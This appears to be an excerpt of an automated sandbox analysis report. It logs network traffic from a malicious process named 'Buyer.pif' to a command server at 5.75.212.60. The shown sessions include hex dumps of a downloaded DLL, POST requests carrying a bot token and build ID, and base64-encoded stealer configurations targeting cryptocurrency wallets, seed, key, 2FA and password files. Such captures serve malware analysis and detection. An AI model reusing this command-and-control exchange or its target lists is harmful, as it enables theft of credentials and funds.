                                                                                                  2024-07-26 17:58:34 UTC16384INData Raw: c9 00 08 00 00 83 e2 18 74 1c 83 fa 08 74 0f 83 fa 10 74 15 b8 ff ff 00 00 e9 f7 01 00 00 81 c9 80 00 00 00 eb 03 83 c9 40 83 e0 06 2b c7 0f 84 df 01 00 00 2b c6 74 1e 2b c6 74 0f 2b c6 75 d4 81 c9 00 04 00 00 e9 c8 01 00 00 81 c9 00 01 00 00 e9 bd 01 00 00 81 c9 00 02 00 00 e9 b2 01 00 00 2b c6 75 af 8d 51 01 89 15 90 f2 00 10 8a 02 3c 30 7c 2a 3c 39 7f 26 0f be c0 83 c2 d1 03 c2 a3 90 f2 00 10 e8 8c fe ff ff 0d 00 00 01 00 e9 81 01 00 00 b8 fe ff 00 00 e9 77 01 00 00 b9 ff ff 00 00 e9 dc 00 00 00 83 f8 2f 0f 8e 63 ff ff ff 8b f2 83 f8 35 7e 62 83 f8 41 0f 85 53 ff ff ff 81 c9 00 90 00 00 e9 b8 00 00 00 b9 fe ff 00 00 4a e9 ad 00 00 00 81 c9 00 98 00 00 e9 a2 00 00 00 83 e8 43 0f 84 94 00 00 00 83 e8 01 0f 84 83 00 00 00 83 e8 01 74 76 83 e8 0d 0f 85 12
                                                                                                  Data Ascii: ttt@++t+t+u+uQ<0|*<9&w/c5~bASJCtv
                                                                                                  2024-07-26 17:58:34 UTC15603INData Raw: 8f f8 b4 e9 00 40 03 d5 1c 16 4c d1 c1 d6 ae e8 7c cd cc c1 be ea d2 ff 35 4e c0 ce b5 7a ad bb a6 bb 2e dc 94 e9 f3 1e 7d e0 ec 28 a3 07 82 66 5a c3 5b 5a cb ec 03 c9 e3 2c 94 15 21 2b a0 f9 d9 9b 4b e7 b6 de eb 20 51 8c 3e fa 2c 23 d5 18 b0 f0 b1 a0 70 6c 7a ef 8b 83 48 a6 3a 02 06 ef a0 8a 2c b7 88 45 30 82 05 ff 30 82 03 e7 a0 03 02 01 02 02 13 33 00 00 01 51 9e 8d 8f 40 71 a3 0e 41 00 00 00 00 01 51 30 0d 06 09 2a 86 48 86 f7 0d 01 01 0b 05 00 30 7e 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 28 30 26 06 03 55 04 03 13 1f 4d 69 63 72 6f 73 6f
                                                                                                  Data Ascii: @L|5Nz.}(fZ[Z,!+K Q>,#plzH:,E003Q@qAQ0*H0~10UUS10UWashington10URedmond10UMicrosoft Corporation1(0&UMicroso


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  16192.168.2.5497265.75.212.604432380C:\Users\user\AppData\Local\Temp\447331\Buyer.pif
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  2024-07-26 17:58:35 UTC238OUTGET /nss3.dll HTTP/1.1
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
                                                                                                  Host: 5.75.212.60
                                                                                                  Connection: Keep-Alive
                                                                                                  Cache-Control: no-cache
                                                                                                  2024-07-26 17:58:36 UTC261INHTTP/1.1 200 OK
                                                                                                  Server: nginx
                                                                                                  Date: Fri, 26 Jul 2024 17:58:36 GMT
                                                                                                  Content-Type: application/octet-stream
                                                                                                  Content-Length: 2046288
                                                                                                  Connection: close
                                                                                                  Last-Modified: Friday, 26-Jul-2024 17:58:36 GMT
                                                                                                  Cache-Control: no-store, no-cache
                                                                                                  Accept-Ranges: bytes
                                                                                                  2024-07-26 17:58:36 UTC16123INData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00
                                                                                                  Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@
                                                                                                  2024-07-26 17:58:36 UTC16384INData Raw: f2 6b d2 64 89 c7 29 d7 c1 fb 15 01 f3 89 c2 69 f3 90 01 00 00 29 f0 83 e2 03 66 85 d2 0f 94 c2 66 85 ff 0f 95 c6 20 d6 66 85 c0 0f 94 c0 08 f0 0f b6 c0 8d 04 40 8b 55 f0 0f be 84 82 20 7c 1a 10 89 41 10 8a 41 1a fe c8 0f b6 c0 ba 06 00 00 00 0f 49 d0 88 51 1a e9 f7 fe ff ff 83 c2 e8 89 51 0c 8b 41 10 89 45 f0 8b 71 14 40 89 41 10 66 ff 41 1c 0f b7 41 18 a8 03 0f 94 c3 69 f8 29 5c 00 00 8d 97 1c 05 00 00 66 c1 ca 02 0f b7 d2 81 fa 8f 02 00 00 0f 93 c2 20 da 81 c7 10 05 00 00 66 c1 cf 04 0f b7 ff 81 ff a3 00 00 00 0f 92 c6 08 d6 0f b6 d6 8d 14 52 0f be 94 96 20 7c 1a 10 39 55 f0 7c 26 89 f7 c7 41 10 01 00 00 00 8d 56 01 89 51 14 83 fe 0b 7c 12 c7 41 14 00 00 00 00 40 66 89 41 18 66 c7 41 1c 00 00 8a 41 1a fe c0 31 d2 3c 07 0f b6 c0 0f 4d c2 88 41 1a e9 51
                                                                                                  Data Ascii: kd)i)ff f@U |AAIQQAEq@AfAAi)\f fR |9U|&AVQ|A@fAfAA1<MAQ
                                                                                                  2024-07-26 17:58:36 UTC16384INData Raw: 1b 10 51 e8 3d b8 06 00 83 c4 0c 66 83 7f 06 00 74 69 31 db 8b 44 9f 14 be 48 01 1d 10 85 c0 74 02 8b 30 68 d3 fe 1b 10 56 e8 f7 5b 19 00 83 c4 08 85 c0 b8 79 64 1c 10 0f 45 c6 8b 4f 10 0f b6 0c 19 f6 c1 02 ba 98 dc 1c 10 be 48 01 1d 10 0f 44 d6 f6 c1 01 b9 b1 de 1c 10 0f 44 ce 50 52 51 68 7f a0 1b 10 8d 44 24 60 50 e8 d6 b7 06 00 83 c4 14 43 0f b7 47 06 39 c3 72 99 8b 44 24 60 8d 48 01 3b 4c 24 58 0f 83 b7 03 00 00 89 4c 24 60 8b 4c 24 54 c6 04 01 29 eb 25 8b 44 24 04 8b 4c 24 08 8b 44 81 10 0f be 08 8d 54 24 50 51 ff 70 20 68 2c e2 1c 10 52 e8 89 b7 06 00 83 c4 10 f6 44 24 64 07 0f 85 4b 03 00 00 8b 44 24 54 85 c0 74 21 8b 4c 24 60 c6 04 08 00 83 7c 24 5c 00 74 12 f6 44 24 65 04 75 0b 8d 4c 24 50 e8 d4 68 06 00 eb 04 8b 44 24 54 89 44 24 18 8b 45 08 8b
                                                                                                  Data Ascii: Q=fti1DHt0hV[ydEOHDDPRQhD$`PCG9rD$`H;L$XL$`L$T)%D$L$DT$PQp h,RD$dKD$Tt!L$`|$\tD$euL$PhD$TD$E
                                                                                                  2024-07-26 17:58:36 UTC16384INData Raw: 08 11 1e 10 40 a3 08 11 1e 10 3b 05 30 11 1e 10 77 26 8b 35 38 11 1e 10 85 f6 74 15 8b 0d 78 e0 1d 10 81 f9 80 c2 12 10 75 7b 56 ff 15 68 cc 1d 10 89 f8 5e 5f 5b 5d c3 a3 30 11 1e 10 eb d3 a3 0c 11 1e 10 eb b9 89 3d 20 11 1e 10 e9 54 ff ff ff 31 ff eb dc 8b 0d 40 e0 1d 10 ff 15 00 40 1e 10 57 ff d1 83 c4 04 eb ca ff 15 00 40 1e 10 56 ff d1 83 c4 04 e9 0b ff ff ff 89 f7 c1 ff 1f 29 f1 19 f8 31 d2 39 0d e4 10 1e 10 19 c2 7d 27 c7 05 50 11 1e 10 00 00 00 00 e9 20 ff ff ff 31 ff e9 6d ff ff ff ff 15 00 40 1e 10 56 ff d1 83 c4 04 e9 7b ff ff ff c7 05 50 11 1e 10 01 00 00 00 8b 1d 38 11 1e 10 85 db 74 2e 8b 0d 78 e0 1d 10 ff 15 00 40 1e 10 53 ff d1 83 c4 04 8b 1d 38 11 1e 10 85 db 74 12 8b 0d 70 e0 1d 10 ff 15 00 40 1e 10 53 ff d1 83 c4 04 a1 4c 11 1e 10 8b 0d
                                                                                                  Data Ascii: @;0w&58txu{Vh^_[]0= T1@@W@V)19}'P 1m@V{P8t.x@S8tp@SL
                                                                                                  2024-07-26 17:58:36 UTC16384INData Raw: 44 24 08 8a 40 12 e9 fc fc ff ff 8b 44 24 08 8b 70 44 8b 06 85 c0 0f 84 81 fd ff ff 8b 48 04 ff 15 00 40 1e 10 56 ff d1 83 c4 04 c7 06 00 00 00 00 e9 67 fd ff ff 8b 44 24 08 8b 70 40 8b 06 85 c0 74 2d 8b 4c 24 08 80 79 0d 00 75 11 8b 48 20 ff 15 00 40 1e 10 6a 01 56 ff d1 83 c4 08 8b 44 24 08 80 78 12 05 74 08 8b 44 24 08 c6 40 12 01 8b 4c 24 08 8a 41 0c 88 41 13 e9 13 fe ff ff 8b 44 24 08 8b 30 8b 4e 1c 85 c9 0f 84 88 fa ff ff 8b 44 24 08 8b b8 ec 00 00 00 ff 15 00 40 1e 10 6a 00 57 56 ff d1 83 c4 0c 89 44 24 0c e9 72 f6 ff ff 8b 4c 24 08 89 81 a0 00 00 00 e9 f7 f9 ff ff 8b 48 04 ff 15 00 40 1e 10 56 ff d1 83 c4 04 c7 06 00 00 00 00 e9 26 fa ff ff 31 f6 46 e9 d2 fc ff ff 31 db f6 44 24 1c 01 0f 84 40 fe ff ff 68 40 7e 1c 10 68 83 e4 00 00 68 14 dd 1b 10
                                                                                                  Data Ascii: D$@D$pDH@VgD$p@t-L$yuH @jVD$xtD$@L$AAD$0ND$@jWVD$rL$H@V&1F1D$@h@~hh
                                                                                                  2024-07-26 17:58:36 UTC16384INData Raw: d8 25 ff ff ff 7f 89 44 24 1c 85 f6 7e 6f 8b 7d 0c 89 54 24 04 8b 0d 30 e4 1d 10 8b 45 08 8b 40 08 89 04 24 ff 15 00 40 1e 10 8d 44 24 10 50 8d 44 24 10 50 56 57 ff 74 24 10 ff d1 85 c0 0f 84 92 00 00 00 8b 44 24 0c 85 c0 8b 54 24 04 74 42 29 c6 72 3e 01 c2 83 d3 00 89 54 24 18 89 d9 81 e1 ff ff ff 7f 89 4c 24 1c 01 c7 85 f6 7f a2 8b 44 24 24 85 c0 0f 85 92 00 00 00 31 ff 8b 4c 24 28 31 e9 e8 9d 64 13 00 89 f8 8d 65 f4 5e 5f 5b 5d c3 8b 0d 8c e2 1d 10 ff 15 00 40 1e 10 ff d1 89 c2 8b 45 08 89 50 14 83 fa 70 74 05 83 fa 27 75 3f bf 0d 00 00 00 b9 0d 00 00 00 68 ee b2 00 00 8b 45 08 ff 70 1c 68 65 8a 1c 10 e8 c4 1e 14 00 83 c4 0c eb a7 8d 4c 24 24 8d 54 24 08 e8 12 20 14 00 85 c0 0f 85 2a ff ff ff 8b 54 24 08 eb b1 bf 0a 03 00 00 b9 0a 03 00 00 68 f3 b2 00
                                                                                                  Data Ascii: %D$~o}T$0E@$@D$PD$PVWt$D$T$tB)r>T$L$D$$1L$(1de^_[]@EPpt'u?hEpheL$$T$ *T$h
                                                                                                  2024-07-26 17:58:36 UTC16384INData Raw: 0c 38 e8 8e f3 ff ff 43 83 c7 30 3b 5e 68 7c ec 8b 44 24 0c 89 46 68 83 7c 24 04 01 75 72 8b 56 64 8d 1c 40 c1 e3 04 83 7c 1a 1c 00 74 4b 8b 4e 48 8b 01 85 c0 74 42 3d 58 00 1a 10 75 34 8b 86 a8 00 00 00 8b be ac 00 00 00 83 c0 04 83 d7 00 89 74 24 04 89 d6 8b 54 1a 18 0f af fa f7 e2 01 fa 52 50 51 e8 8c 45 12 00 89 f2 8b 74 24 10 83 c4 0c 8b 44 1a 18 89 46 38 31 ff 8b 4c 24 30 31 e9 e8 9f 24 13 00 89 f8 8d 65 f4 5e 5f 5b 5d c3 89 74 24 04 8b 86 e8 00 00 00 89 44 24 08 85 c0 0f 84 88 01 00 00 83 7c 24 0c 00 0f 84 ac 00 00 00 8b 44 24 04 8b 70 64 85 f6 0f 84 9d 00 00 00 8b 44 24 0c 48 8d 3c 40 c1 e7 04 8b 44 3e 14 89 44 24 0c b9 00 02 00 00 31 d2 e8 56 3e ff ff 89 44 24 18 85 c0 0f 84 ce 02 00 00 8d 04 3e 89 44 24 14 8d 04 3e 83 c0 14 89 44 24 08 8b 5c 24
                                                                                                  Data Ascii: 8C0;^h|D$Fh|$urVd@|tKNHtB=Xu4t$TRPQEt$DF81L$01$e^_[]t$D$|$D$pdD$H<@D>D$1V>D$>D$>D$\$
                                                                                                  2024-07-26 17:58:36 UTC16384INData Raw: 00 00 8b 99 4c 01 00 00 85 db 0f 85 82 00 00 00 8b 99 48 01 00 00 85 db 75 6b 8b 99 44 01 00 00 85 db 75 7b ff 81 40 01 00 00 8a 5d f3 88 d8 50 e8 d0 ca 11 00 83 c4 04 89 c3 85 c0 0f 84 a7 00 00 00 57 ff 75 e4 53 e8 0f 1c 18 00 83 c4 0c c6 04 3b 00 8d 04 b6 8b 4d ec 8d 04 81 83 c0 0c 89 18 0f b6 0b 80 b9 7a f8 19 10 00 78 4a 8b 4d e8 80 b9 d0 00 00 00 02 0f 83 83 00 00 00 83 c4 10 5e 5f 5b 5d c3 8b 03 89 81 48 01 00 00 e9 50 ff ff ff 8b 03 89 81 4c 01 00 00 e9 43 ff ff ff 8b 03 89 81 44 01 00 00 e9 36 ff ff ff ff 81 3c 01 00 00 e9 73 ff ff ff 80 f9 5b 0f b6 c9 ba 5d 00 00 00 0f 45 d1 89 55 ec 31 f6 46 89 df 8a 0c 33 3a 4d ec 74 06 88 0f 46 47 eb f2 8b 4d ec 38 4c 33 01 74 2d c6 07 00 eb 84 8d 04 b6 8b 4d ec 8d 04 81 83 c0 0c c7 00 00 00 00 00 e9 6d ff ff
                                                                                                  Data Ascii: LHukDu{@]PWuS;MzxJM^_[]HPLCD6<s[]EU1F3:MtFGM8L3t-Mm
                                                                                                  2024-07-26 17:58:36 UTC16384INData Raw: e8 60 50 fe ff 31 c0 39 46 24 0f 84 b8 f6 ff ff 8b 57 10 85 d2 74 09 8b 4c 24 20 e8 75 c2 ff ff 8b 7c 24 0c c7 47 10 00 00 00 00 e9 98 f6 ff ff 8b 06 89 81 44 01 00 00 e9 e3 f9 ff ff ff 81 3c 01 00 00 e9 80 fc ff ff 8b 44 24 14 80 b8 d0 00 00 00 00 0f 85 f3 fb ff ff 8b 44 24 20 8b 40 10 8b 4c 38 0c 83 79 48 00 0f 85 de fb ff ff ff 34 38 68 b4 e0 1c 10 ff 74 24 1c e8 06 09 00 00 83 c4 0c e9 c5 fb ff ff 8b 4c 24 1c e9 ae fd ff ff 8a 80 08 f7 19 10 3a 83 08 f7 19 10 0f 84 02 fa ff ff e9 c9 f9 ff ff 8b 44 24 20 80 b8 b1 00 00 00 00 0f 84 47 04 00 00 68 48 01 1d 10 ff 74 24 18 e8 5f 2a 01 00 83 c4 08 e9 33 f7 ff ff 8b 44 24 0c 80 48 1e 01 66 83 78 22 00 0f 8e a5 f5 ff ff 31 c9 b8 0e 00 00 00 8b 54 24 0c 8b 52 04 8b 74 02 f6 89 f7 c1 ef 04 83 e7 0f 83 ff 01 74
                                                                                                  Data Ascii: `P19F$WtL$ u|$GD<D$D$ @L8yH48ht$L$:D$ GhHt$_*3D$Hfx"1T$Rtt
                                                                                                  2024-07-26 17:58:36 UTC16384INData Raw: 85 c0 0f 85 34 f9 ff ff e9 a7 e8 ff ff c7 44 24 24 00 00 00 00 e9 0b f1 ff ff 8b 44 24 0c 8b 40 10 8b 40 1c 8b 4c 24 08 3b 41 3c 0f 84 95 ea ff ff 8b 7c 24 08 ff 37 68 27 f8 1c 10 ff 74 24 0c e8 e0 ea 00 00 83 c4 0c c7 44 24 24 00 00 00 00 e9 a2 f0 ff ff 68 48 e4 1b 10 8b 7c 24 08 57 e8 c1 ea 00 00 83 c4 08 be 0b 00 00 00 68 40 7e 1c 10 68 14 ce 01 00 68 40 bb 1b 10 68 78 fc 1b 10 56 e8 8f 4f 01 00 83 c4 14 89 77 0c c7 44 24 1c 00 00 00 00 e9 83 f8 ff ff 66 ba 1e 00 31 c0 85 c9 0f 85 54 f1 ff ff 31 d2 e9 5b f1 ff ff 31 ff 66 ba 28 00 be ff 0f 00 00 89 cb 31 c0 83 c2 28 89 f9 0f a4 d9 1c c1 e8 04 39 de bb 00 00 00 00 19 fb 89 cb 89 c7 0f 83 f2 f0 ff ff eb df a9 fd ff ff ff 74 65 31 f6 46 b8 ec bb 1b 10 e9 c1 fd ff ff 31 c0 e9 85 f2 ff ff c7 44 24 18 00 00
                                                                                                  Data Ascii: 4D$$D$@@L$;A<|$7h't$D$$hH|$Wh@~hh@hxVOwD$f1T1[1f(1(9te1F1D$


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  17192.168.2.5497275.75.212.604432380C:\Users\user\AppData\Local\Temp\447331\Buyer.pif
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  2024-07-26 17:58:39 UTC323OUTPOST / HTTP/1.1
                                                                                                  Content-Type: multipart/form-data; boundary=----FIIECFHDBAAECAAKFHDH
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
                                                                                                  Host: 5.75.212.60
                                                                                                  Content-Length: 1145
                                                                                                  Connection: Keep-Alive
                                                                                                  Cache-Control: no-cache
                                                                                                  2024-07-26 17:58:39 UTC1145OUTData Raw: 2d 2d 2d 2d 2d 2d 46 49 49 45 43 46 48 44 42 41 41 45 43 41 41 4b 46 48 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 37 65 61 65 63 62 63 34 38 63 32 31 31 31 65 66 35 64 63 33 32 37 37 30 65 31 30 31 30 31 38 0d 0a 2d 2d 2d 2d 2d 2d 46 49 49 45 43 46 48 44 42 41 41 45 43 41 41 4b 46 48 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 31 61 37 32 65 62 30 36 39 33 39 65 61 34 37 38 37 35 33 64 35 63 34 64 66 34 62 32 62 64 33 32 0d 0a 2d 2d 2d 2d 2d 2d 46 49 49 45 43 46 48 44 42 41 41 45 43 41 41 4b 46 48 44 48 0d 0a 43 6f 6e 74
                                                                                                  Data Ascii: ------FIIECFHDBAAECAAKFHDHContent-Disposition: form-data; name="token"77eaecbc48c2111ef5dc32770e101018------FIIECFHDBAAECAAKFHDHContent-Disposition: form-data; name="build_id"1a72eb06939ea478753d5c4df4b2bd32------FIIECFHDBAAECAAKFHDHCont
                                                                                                  2024-07-26 17:58:39 UTC158INHTTP/1.1 200 OK
                                                                                                  Server: nginx
                                                                                                  Date: Fri, 26 Jul 2024 17:58:39 GMT
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Transfer-Encoding: chunked
                                                                                                  Connection: close
                                                                                                  2024-07-26 17:58:39 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                  Data Ascii: 2ok0


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  18192.168.2.5497285.75.212.604432380C:\Users\user\AppData\Local\Temp\447331\Buyer.pif
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  2024-07-26 17:58:40 UTC322OUTPOST / HTTP/1.1
                                                                                                  Content-Type: multipart/form-data; boundary=----IIEHCFIDHIDGIDHJEHID
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
                                                                                                  Host: 5.75.212.60
                                                                                                  Content-Length: 331
                                                                                                  Connection: Keep-Alive
                                                                                                  Cache-Control: no-cache
                                                                                                  2024-07-26 17:58:40 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 49 49 45 48 43 46 49 44 48 49 44 47 49 44 48 4a 45 48 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 37 65 61 65 63 62 63 34 38 63 32 31 31 31 65 66 35 64 63 33 32 37 37 30 65 31 30 31 30 31 38 0d 0a 2d 2d 2d 2d 2d 2d 49 49 45 48 43 46 49 44 48 49 44 47 49 44 48 4a 45 48 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 31 61 37 32 65 62 30 36 39 33 39 65 61 34 37 38 37 35 33 64 35 63 34 64 66 34 62 32 62 64 33 32 0d 0a 2d 2d 2d 2d 2d 2d 49 49 45 48 43 46 49 44 48 49 44 47 49 44 48 4a 45 48 49 44 0d 0a 43 6f 6e 74
                                                                                                  Data Ascii: ------IIEHCFIDHIDGIDHJEHIDContent-Disposition: form-data; name="token"77eaecbc48c2111ef5dc32770e101018------IIEHCFIDHIDGIDHJEHIDContent-Disposition: form-data; name="build_id"1a72eb06939ea478753d5c4df4b2bd32------IIEHCFIDHIDGIDHJEHIDCont
                                                                                                  2024-07-26 17:58:40 UTC158INHTTP/1.1 200 OK
                                                                                                  Server: nginx
                                                                                                  Date: Fri, 26 Jul 2024 17:58:40 GMT
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Transfer-Encoding: chunked
                                                                                                  Connection: close
                                                                                                  2024-07-26 17:58:40 UTC2228INData Raw: 38 61 38 0d 0a 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47
                                                                                                  Data Ascii: 8a8Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZG


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  19192.168.2.5497295.75.212.604432380C:\Users\user\AppData\Local\Temp\447331\Buyer.pif
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  2024-07-26 17:58:41 UTC322OUTPOST / HTTP/1.1
                                                                                                  Content-Type: multipart/form-data; boundary=----BKEHDGDGHCBGCAKFIIIE
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
                                                                                                  Host: 5.75.212.60
                                                                                                  Content-Length: 331
                                                                                                  Connection: Keep-Alive
                                                                                                  Cache-Control: no-cache
                                                                                                  2024-07-26 17:58:41 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 42 4b 45 48 44 47 44 47 48 43 42 47 43 41 4b 46 49 49 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 37 65 61 65 63 62 63 34 38 63 32 31 31 31 65 66 35 64 63 33 32 37 37 30 65 31 30 31 30 31 38 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 45 48 44 47 44 47 48 43 42 47 43 41 4b 46 49 49 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 31 61 37 32 65 62 30 36 39 33 39 65 61 34 37 38 37 35 33 64 35 63 34 64 66 34 62 32 62 64 33 32 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 45 48 44 47 44 47 48 43 42 47 43 41 4b 46 49 49 49 45 0d 0a 43 6f 6e 74
                                                                                                  Data Ascii: ------BKEHDGDGHCBGCAKFIIIEContent-Disposition: form-data; name="token"77eaecbc48c2111ef5dc32770e101018------BKEHDGDGHCBGCAKFIIIEContent-Disposition: form-data; name="build_id"1a72eb06939ea478753d5c4df4b2bd32------BKEHDGDGHCBGCAKFIIIECont
                                                                                                  2024-07-26 17:58:42 UTC158INHTTP/1.1 200 OK
                                                                                                  Server: nginx
                                                                                                  Date: Fri, 26 Jul 2024 17:58:42 GMT
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Transfer-Encoding: chunked
                                                                                                  Connection: close
                                                                                                  2024-07-26 17:58:42 UTC1524INData Raw: 35 65 38 0d 0a 52 6d 78 68 63 32 68 38 4a 55 52 53 53 56 5a 46 58 31 4a 46 54 55 39 57 51 55 4a 4d 52 53 56 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 69 6f 73 4b 6e 4e 6c 5a 57 51 71 4c 69 6f 73 4b 6d 4a 30 59 79 6f 75 4b 69 77 71 61 32 56 35 4b 69 34 71 4c 43 6f 79 5a 6d 45 71 4c 69 6f 73 4b 6d 4e 79 65 58 42 30 62 79 6f 75 4b 69 77 71 59 32 39 70 62 69 6f 75 4b 69 77 71 63 48 4a 70 64 6d 46 30 5a 53 6f 75 4b 69 77 71 4d 6d 5a 68 4b 69 34 71 4c 43 70 68 64 58 52 6f 4b 69 34 71 4c 43 70 73 5a 57 52 6e 5a 58 49 71 4c 69 6f 73 4b 6e 52 79 5a 58 70 76 63 69 6f 75 4b 69 77 71 63 47 46 7a 63 79 6f 75 4b 69 77 71 64 32 46 73 4b 69 34 71 4c 43 70 31 63 47 4a 70 64 43 6f 75 4b 69 77 71 59 6d 4e 6c 65 43 6f 75 4b 69 77 71 59 6d 6c 30 61 47 6c 74 59 69 6f 75 4b 69
                                                                                                  Data Ascii: 5e8Rmxhc2h8JURSSVZFX1JFTU9WQUJMRSVcfCp3YWxsZXQqLiosKnNlZWQqLiosKmJ0YyouKiwqa2V5Ki4qLCoyZmEqLiosKmNyeXB0byouKiwqY29pbiouKiwqcHJpdmF0ZSouKiwqMmZhKi4qLCphdXRoKi4qLCpsZWRnZXIqLiosKnRyZXpvciouKiwqcGFzcyouKiwqd2FsKi4qLCp1cGJpdCouKiwqYmNleCouKiwqYml0aGltYiouKi


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  20192.168.2.5497305.75.212.604432380C:\Users\user\AppData\Local\Temp\447331\Buyer.pif
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  2024-07-26 17:58:42 UTC322OUTPOST / HTTP/1.1
                                                                                                  Content-Type: multipart/form-data; boundary=----DAFBGHCAKKFCAKEBKJKK
